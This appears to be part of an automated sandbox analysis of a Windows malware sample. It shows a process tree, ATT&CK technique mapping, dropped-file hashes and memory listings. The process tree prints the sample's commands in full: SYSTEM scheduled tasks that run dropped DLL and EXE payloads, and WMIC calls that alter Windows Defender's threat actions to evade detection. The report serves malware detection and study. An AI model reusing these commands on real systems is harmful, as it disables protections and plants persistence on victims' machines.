schtasks /DELETE /F /TN "JRajWlGIFNTafba"
2⤵
PID:2392

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qSowRyyhLSmcKu" /F /xml "C:\Program Files (x86)\ELOJFuMDhuHU2\WYMtWzg.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2840

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "zZitECanQvSGT2" /F /xml "C:\ProgramData\pDJsDjHXtdwyYAVB\DmcMtyD.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2184

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "HnoUfytMDNockSMLx2" /F /xml "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\vTkUehy.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2276

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YDobIUwcTgUwZexlzfE2" /F /xml "C:\Program Files (x86)\pQmgloyPupxgC\PJTHkPM.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1872

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "wNQepEmyQbhZnWiRT" /SC once /ST 03:51:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rUaCEWwDdnKMYjxw\cUpLgmIb\ZhTPcwo.dll\",#1 /site_id 767" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3356

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "wNQepEmyQbhZnWiRT"
2⤵
PID:3064

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "spuJUUoxaRVS" /SC once /ST 04:00:39 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\ZdnBpBFf\oqNVXZi.exe\" en /S"
2⤵
- Creates scheduled task(s)
PID:3852

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "spuJUUoxaRVS"
2⤵
PID:2416

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "spuJUUoxaRVS"
2⤵
PID:888

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "spuJUUoxaRVS"
2⤵
PID:2816

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jrzNdZzegeVMzeqYf"
2⤵
PID:3036

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\rUaCEWwDdnKMYjxw\cUpLgmIb\ZhTPcwo.dll",#1 /site_id 767
1⤵
PID:3764

C:\Windows\SysWOW64\rundll32.exe
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\rUaCEWwDdnKMYjxw\cUpLgmIb\ZhTPcwo.dll",#1 /site_id 767
2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
PID:2104

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "wNQepEmyQbhZnWiRT"
3⤵
PID:1548

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\ZdnBpBFf\oqNVXZi.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\ZdnBpBFf\oqNVXZi.exe en /S
1⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
PID:3604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:2876

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3724

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:2848

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2372

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1148

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1456

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2056

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:2980

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2416

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:2196

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2104

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Browser Extensions

T1176

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\ELOJFuMDhuHU2\WYMtWzg.xml
MD5
751157a817ae4f6c68bdfcf75c9478a5

SHA1
ceac6885faab022f28b03d0370784ba96e44f67f

SHA256
8f33b8e1a66aa61b8489627632a8c9ddf0cb676611e8ece9ae7e51ad0f461dbb

SHA512
e030ce71ddbdb5d58c7ddc59a1c45be1c056b5faacbf04efc83197eb418d16b7b8bb0d88c54f9a7010000f03181f7d10037940f81987167617dbd6c9cd95c8df

Download Submit
C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\vTkUehy.xml
MD5
354cf0ca091e7495510a1336af219d72

SHA1
c7ccf255bfc8b744a1e26e773f3e1a1ed7bd455e

SHA256
5d6c4bf52b6b01b36ef4d2ddcf30b348c39d7f62a12bad47e681fa86e190972e

SHA512
d686e5c45dacc191bcb4bf816bdea0089197fc0ac829c41d21430788f7f8fedf15287f8689a5ccf312761cff6590bfa9867d9c60ab7e2fa8dfadb85a75213059

Download Submit
C:\Program Files (x86)\anjFGKdzU\gMqHwmC.xml
MD5
550565f1f8c023963846434b1e859875

SHA1
68e489ebd937a8b5d3672812e00d107b1b0c69fd

SHA256
178ac9e5aa9a8fb98301472730c254112fabcd38770bf2251081f6f5765239f3

SHA512
b331021c866506042a30a19473aa9a264af5fa2a98e3cd3ffcd4630556e2e32b149d71508ee161bc1de956923ef35e579512f10acd0d7a6bf55aad90467fe9e0

Download Submit
C:\Program Files (x86)\pQmgloyPupxgC\PJTHkPM.xml
MD5
873a230cfd2bdcd579421ea1273633da

SHA1
a0ab09cdbf8fc14b9a694cc3ff88765226083eab

SHA256
536d107df1a611f338b59940ffec705cc4118ea27ed12060ee43e2b2c6bc5fe6

SHA512
e355ec5314ae4f293d184a6a283063a8a34fa892804820b99f657c348977577204f505148b44b40f98c1bd65c8c080f104e8afccca4550a8df74b0539ea8602e

Download Submit
C:\ProgramData\pDJsDjHXtdwyYAVB\DmcMtyD.xml
MD5
b4ec2fe7b93796ae213d849bf6dd8eec

SHA1
576d569c0364db3cc38d325357ebb5103f6f2d36

SHA256
d0d6127aca4158473ac59360f01174eac1af45e396fb63f1363dc0b2241570af

SHA512
02d523d0dc11c0b47b9b965bb60c0875b73a974320efe880c7cef1b4c8ad8b3355a65c808f271544b699c9185f6377b2389eb48872a984e8131b8fb61dc11512

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
MD5
f6c90ab0db80c6c3ea92556fda7273c7

SHA1
01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa

SHA256
a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269

SHA512
aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
0f5cbdca905beb13bebdcf43fb0716bd

SHA1
9e136131389fde83297267faf6c651d420671b3f

SHA256
a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060

SHA512
a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2cdc8f87edf7e724a72c040080ba945a

SHA1
c94139d5794a0d12ded0e4d434b888ef28d682a8

SHA256
9572d6e6e78e54788e9504bbf322b6b7e7d80fd0385dd05d4fb3018e2a04b56e

SHA512
f73ef342a208eafa9f5ec65e7c0c2dac84d12863fd17b3ef0cae3f86c34095883b6527826e07ffb5d8dc9be26edcd6d6f63feee2cf83f8e8a5faa15fe11b25d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
db19478cf548447fe0219597b2f93629

SHA1
003c3dc18681ffd44da242427f48316f21a5c66d

SHA256
3f828132b60cb3df5006e91d529a907edcdbc962c51300a673ec2c2973ff3cf2

SHA512
8ab9d8449850522ffb76c4d72994f4cb8a5cf047426cbb23ea22c5b0b9b28046fcf302493d158b53c245b494a2b96b6155daddf958d0e04879aedd3099a0e887

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
b02752149227f9f2bba3b8b26713aa3c

SHA1
048e3ad42078224d2b8f06272944534020a799e5

SHA256
045b482f945df3b557363ac2b31b1cd29ca4d5e7b71093f2eb215151c9cd8337

SHA512
2de83eb6e1fa10ef4680a96ef2c5f71ec375cae65460a3e966e2eeb3b29fd180921557a0472967ffe3acfe4bee140a43bccc9af848f6547bc11844b726413b4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4dbe9266c72d18b4aeaf32d751dadffd

SHA1
f8262d3c1f0afcaae8747c6e7df0ed1604965d31

SHA256
b25c41ed972b2782c891484fec22e52532554278aa87c720c2a30a88b2fb8ac5

SHA512
9220c673b0cbe157bb4a526376c02f0996a82b5fc177093e911a6f206f2fc2f31265c879d6cfdc5c86cfeacf600b6322ef61d0bc655b0bc1554236004c749e1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
22c4dcd18341ea41dd6c6ff98386c9b4

SHA1
441fa073b3ca169ac35beb13c54154d5f0cc4653

SHA256
17bad362edea94d0240097b22e1b97e77f32be003e4fe0b7b097fe6d563362f0

SHA512
bc9b94792bf0d8805289a3417a14fd67ec69aae18f3d11c7cd43aea4670f00b87470a98a1fb6dbd206cd89f07e7225a33a1b69c204c642ceccdb7b29c0b2a7b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6f97b61f11c9bc6ccf513ef647b27eac

SHA1
a751a0f9013601836b3c3393e107d12083adf4e1

SHA256
c8e5d50599e7ba0ff3f0750580b1715e0ce0205a126e82d5601f535087166f95

SHA512
cf8ef56925dd844c553597ef2b4fce8c41efed625242be69c2d9d1b8389745e785521f0cf81f329e7fff51ca21e0e92e0adc5c9acc6f119eb428473963e35a9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a47292c15975ebf17eaffa3eb7ebb8df

SHA1
0c01ca539b1fe17798caf5949636947272a5b69c

SHA256
b331acaa58c2bff75e28aec163ebd98d8e17f46c88baef97b8e051ceed7740c0

SHA512
6a4573f0a6a89d03070ecde513d6b93b0d73068ac2488f7f9e4adc70156d01a1f1ad54ed0bac9fbe0bf9d0ef8ef744be9107ed0f81191e0ae8da0fca08728fbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7B60.tmp\SimplInst.exe
MD5
46df9dcd0ad008a87f7622bfbcec411b

SHA1
0a4c7dd60e6d7a1b5fd06ad3480a26eed4163bba

SHA256
e4210262fea7091bbff2663ab44015417e4ff6b96f5003864a2e5096b203ea3a

SHA512
e3d2941790b2adb23dfcbf9b29b74c3df05089569490105a72e363f718c75ab9038d5f559ebf5ffd878d5da5054fcbb157bb1186c4d0d02d97ec9d0f813f7948

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7B60.tmp\SimplInst.exe
MD5
46df9dcd0ad008a87f7622bfbcec411b

SHA1
0a4c7dd60e6d7a1b5fd06ad3480a26eed4163bba

SHA256
e4210262fea7091bbff2663ab44015417e4ff6b96f5003864a2e5096b203ea3a

SHA512
e3d2941790b2adb23dfcbf9b29b74c3df05089569490105a72e363f718c75ab9038d5f559ebf5ffd878d5da5054fcbb157bb1186c4d0d02d97ec9d0f813f7948

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7C3A.tmp\SimplInst.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7C3A.tmp\SimplInst.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\ZdnBpBFf\oqNVXZi.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\ZdnBpBFf\oqNVXZi.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\HvCBxel.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\HvCBxel.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
0f5cbdca905beb13bebdcf43fb0716bd

SHA1
9e136131389fde83297267faf6c651d420671b3f

SHA256
a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060

SHA512
a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
75a5a26a0e054b55966234dcb4339de3

SHA1
d560dedcee4037806aa90626d09ba865ebb07a0b

SHA256
79c7d4875e2e4189c326dec9e117f8bf68b9502135e49de2a0024fc6d041a33c

SHA512
a177a0a71698e1dcc7294d6399c22772555d75ef045ce5bef5916ab8c2764966fc555e321ac469fcc6a894dd0d2d04abe55f0d65f36ef95097652aa0cad3d5bf

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
61acd6a79338159ea2313dec84ff90a0

SHA1
d1cef5519e1a9c84261d0d0f0481d6163f8ecde0

SHA256
c80d98d407584fa0911b0fd14db5b77c6d526300f9ea1b40e7c4b61c8c6126db

SHA512
4d7de7da30484ac59ade9548ddd7accbcc178c20ede4d8d5a776d989e1d2ae3cd1cdf12f3b38913c3ed967b5a2ee2a3094b6255693ebbe289a213b2dce3be653

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
7284ea9a0bdb4ff501c41fc459c6cf2d

SHA1
d7d079289443cde315e5114469990e7592c56d53

SHA256
aca535620a45932eb3e702532c1ef526169b326b58b6296daebc6a71d7df161a

SHA512
e07ef3d548d53be5ba0fe74f5e313ccaba13c955a0d58436019d88655e5a38c6e7cd4406a47046004d71ba7047be18ab72d3105947ebd7795c1821b203f35d80

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a4700b6eac4f592d874dcdd6b391dd61

SHA1
2364aff259c6c48e05d03b1d0bd557a076524eb8

SHA256
e2e70623783ec2afd5b78598917b7f09baedfea11e82533e5f3a38680dbe9956

SHA512
84e8a92b84de5adf2701457f31450cf13b38e8ee48308a3f4529f5e7db13eae29cc493856d1083360ee30d9f6224dbb9595eba826f556aee0bb0ed09f2f27b12

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a0cf0980855e67838d971aa2e5950ea5

SHA1
e44c78a1544be0576e788a290fba4b3f1c4bbcee

SHA256
8ae721bb2b0e7ad68efda1ec3419bc38feb66f8f94444072b1c939fa49ca731c

SHA512
f41fa96c3bd0e9d788aa3caec7026c49467399952d9d3ce4e9f1b28250a91329823bac1d58cb212a98991d3aeb9213d3adeb7c8486c9c22161db6521e23d7c07

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
cb7e34dfb532c676ee7742353cda1495

SHA1
928cd30e221b7e08acc9a7c815ab728709870452

SHA256
087e9c23a5bece00bcd773f9f7351de6bb22e1f3ffbebc9762ed3c3949e72ddc

SHA512
fa04b62b0907f2ae22fa505ad76bf9cee953b6bdad728eaee858541b442e0a49d8cbe24a410454d8c063ef20f4dfc08db2482c07de6a51c49e3528f520621649

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
dd1de13869598b2153193d7bd37ee66f

SHA1
4699674aded5524721ad90d85f01608ea2e1969f

SHA256
ab9d31ac3adf78eafed6479b3da9aaaf143573f1adb2d9236426adf0c10921f3

SHA512
3954ffaa45c2abb3695d2554c3d3b18527bcb3dd12e13d5990444c26539a80b85fca309de91cf3bb0e144df4f60b574ea7c1b1011e5116e47fa754b7ef43c3c2

Download Submit
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\HrhavpK.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\HrhavpK.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Windows\Temp\rUaCEWwDdnKMYjxw\cUpLgmIb\ZhTPcwo.dll
MD5
7f02a4cf475a581e3a2501f303dec277

SHA1
5e20847b2f86d73d913f8cba4f64fca47693ca55

SHA256
830df31c9c9141bf0af8278b1ab19a5df448a884a72ad69cc1204aa94ee0b1b7

SHA512
ea988d14259b28639623202126f183cbc74790235b05f4a70f81fba4f40858f6cb849feb521e51b6b36e685342e104a35af94e1254b00ae643b5fcf7ecb52d58

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini
MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\Windows\Temp\rUaCEWwDdnKMYjxw\cUpLgmIb\ZhTPcwo.dll
MD5
7f02a4cf475a581e3a2501f303dec277

SHA1
5e20847b2f86d73d913f8cba4f64fca47693ca55

SHA256
830df31c9c9141bf0af8278b1ab19a5df448a884a72ad69cc1204aa94ee0b1b7

SHA512
ea988d14259b28639623202126f183cbc74790235b05f4a70f81fba4f40858f6cb849feb521e51b6b36e685342e104a35af94e1254b00ae643b5fcf7ecb52d58

Download Submit
memory/192-220-0x0000000000000000-mapping.dmp

Download
memory/192-120-0x0000000000000000-mapping.dmp

Download
memory/344-191-0x0000000000000000-mapping.dmp

Download
memory/592-239-0x00000000039E4000-0x00000000039E6000-memory.dmp

Filesize
8KB

Download
memory/592-238-0x00000000039E3000-0x00000000039E4000-memory.dmp

Filesize
4KB

Download
memory/592-232-0x00000000039E2000-0x00000000039E3000-memory.dmp

Filesize
4KB

Download
memory/592-231-0x00000000039E0000-0x00000000039E1000-memory.dmp

Filesize
4KB

Download
memory/592-230-0x0000000006E00000-0x0000000006E01000-memory.dmp

Filesize
4KB

Download
memory/592-222-0x0000000000000000-mapping.dmp

Download
memory/640-122-0x0000000000000000-mapping.dmp

Download
memory/656-273-0x0000000000000000-mapping.dmp

Download
memory/816-306-0x0000000005360000-0x0000000005361000-memory.dmp

Filesize
4KB

Download
memory/816-308-0x0000000005363000-0x0000000005364000-memory.dmp

Filesize
4KB

Download
memory/816-307-0x0000000005362000-0x0000000005363000-memory.dmp

Filesize
4KB

Download
memory/816-262-0x0000000000000000-mapping.dmp

Download
memory/816-309-0x0000000005364000-0x0000000005366000-memory.dmp

Filesize
8KB

Download
memory/816-186-0x0000000000000000-mapping.dmp

Download
memory/904-117-0x0000000000000000-mapping.dmp

Download
memory/904-137-0x0000000010000000-0x0000000010584000-memory.dmp

Filesize
5.5MB

Download
memory/1116-235-0x0000000000000000-mapping.dmp

Download
memory/1208-279-0x0000000000000000-mapping.dmp

Download
memory/1236-276-0x0000000000000000-mapping.dmp

Download
memory/1328-221-0x0000000000000000-mapping.dmp

Download
memory/1340-267-0x0000000000000000-mapping.dmp

Download
memory/1456-333-0x0000000007443000-0x0000000007444000-memory.dmp

Filesize
4KB

Download
memory/1456-330-0x0000000007440000-0x0000000007441000-memory.dmp

Filesize
4KB

Download
memory/1456-334-0x0000000007444000-0x0000000007446000-memory.dmp

Filesize
8KB

Download
memory/1456-331-0x0000000007442000-0x0000000007443000-memory.dmp

Filesize
4KB

Download
memory/1568-212-0x0000000000000000-mapping.dmp

Download
memory/1576-167-0x0000000000000000-mapping.dmp

Download
memory/1592-259-0x0000000000000000-mapping.dmp

Download
memory/1680-275-0x0000000000000000-mapping.dmp

Download
memory/1680-253-0x0000000000000000-mapping.dmp

Download
memory/1684-260-0x0000000000000000-mapping.dmp

Download
memory/1688-287-0x0000000000000000-mapping.dmp

Download
memory/1860-214-0x0000014AA8706000-0x0000014AA8708000-memory.dmp

Filesize
8KB

Download
memory/1860-203-0x0000014AA8703000-0x0000014AA8705000-memory.dmp

Filesize
8KB

Download
memory/1860-202-0x0000014AA8700000-0x0000014AA8702000-memory.dmp

Filesize
8KB

Download
memory/1860-201-0x0000014AA8D00000-0x0000014AA8D01000-memory.dmp

Filesize
4KB

Download
memory/1860-196-0x0000014AA8B40000-0x0000014AA8B41000-memory.dmp

Filesize
4KB

Download
memory/1948-261-0x0000000000000000-mapping.dmp

Download
memory/2000-270-0x0000000000000000-mapping.dmp

Download
memory/2052-146-0x0000000000000000-mapping.dmp

Download
memory/2052-283-0x0000000005544000-0x0000000005546000-memory.dmp

Filesize
8KB

Download
memory/2052-256-0x0000000005542000-0x0000000005543000-memory.dmp

Filesize
4KB

Download
memory/2052-255-0x0000000005540000-0x0000000005541000-memory.dmp

Filesize
4KB

Download
memory/2052-282-0x0000000005543000-0x0000000005544000-memory.dmp

Filesize
4KB

Download
memory/2052-252-0x0000000000000000-mapping.dmp

Download
memory/2056-305-0x0000000002FA4000-0x0000000002FA6000-memory.dmp

Filesize
8KB

Download
memory/2056-304-0x0000000002FA3000-0x0000000002FA4000-memory.dmp

Filesize
4KB

Download
memory/2056-302-0x0000000002FA2000-0x0000000002FA3000-memory.dmp

Filesize
4KB

Download
memory/2056-301-0x0000000002FA0000-0x0000000002FA1000-memory.dmp

Filesize
4KB

Download
memory/2184-121-0x0000000000000000-mapping.dmp

Download
